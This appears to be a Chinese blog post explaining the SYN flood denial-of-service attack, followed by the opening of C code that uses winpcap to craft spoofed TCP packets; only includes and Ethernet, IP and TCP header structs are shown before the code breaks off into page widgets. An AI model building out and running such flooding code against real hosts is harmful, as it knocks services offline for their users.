win_pcap模拟syn_flood攻击

本文介绍了SYN Flood攻击的原理,通过在Windows平台上利用win_pcap库模拟该攻击。攻击者向目标主机发送大量带有虚假源IP的TCP连接请求,导致目标主机资源消耗并等待无效的TCP应答,从而实施拒绝服务。尽管现代防御机制已能有效防止此类攻击,但此实验仍展示了攻击机理。
摘要由CSDN通过智能技术生成

syn_flood攻击得原理很简单,通过向目的主机发送大量建立TCP连接得请求,但源IP地址是乱填的,所以本机不会收到TCP应答,而其它主机收到TCP应答后由于之前并没有请求过TCP连接,所以会丢弃这个应答,导致被攻击的主机空等一段时间,资源被白白浪费。

当然这也是理论上的结果,实际上在现在,这种攻击肯定是行不通的。

#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <string.h>
#include <stdio.h>
#include <wtypes.h>
#pragma comment(lib,"ws2_32.lib")

#define SEQ 0x12121212
#define PCAP_ERRBUF_SIZE 256

typedef struct et_header

{
	unsigned char eh_dst[6]; //目的地址
	unsigned char eh_src[6]; //源地址
	unsigned short eh_type; //eh_type的值需要考察上一层的协议,如果为ip则为0×0800
}ET_HEADER;

//IPv4包头结构体
typedef struct ip_header {
	unsigned char ver_ihl;          //Version (4 bits) + Internet header length (4 bits)
	unsigned char tos;              //Type of service
	unsigned short tlen;            //Total length
	unsigned short identification;  //Identification
	unsigned short flags_fo;        //Flags (3 bits) + Fragment offset (13 bits)
	unsigned char ttl;              //Time to live
	unsigned char proto;            //Protocol
	unsigned short crc;             //Header checksum
	unsigned long ip_src;               //Source address
	unsigned long ip_dst;               //Destination address
}IPHEADER, *PIPHEADER;
//TCP包头结构体
typedef struct tcp_header {
	WOR
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值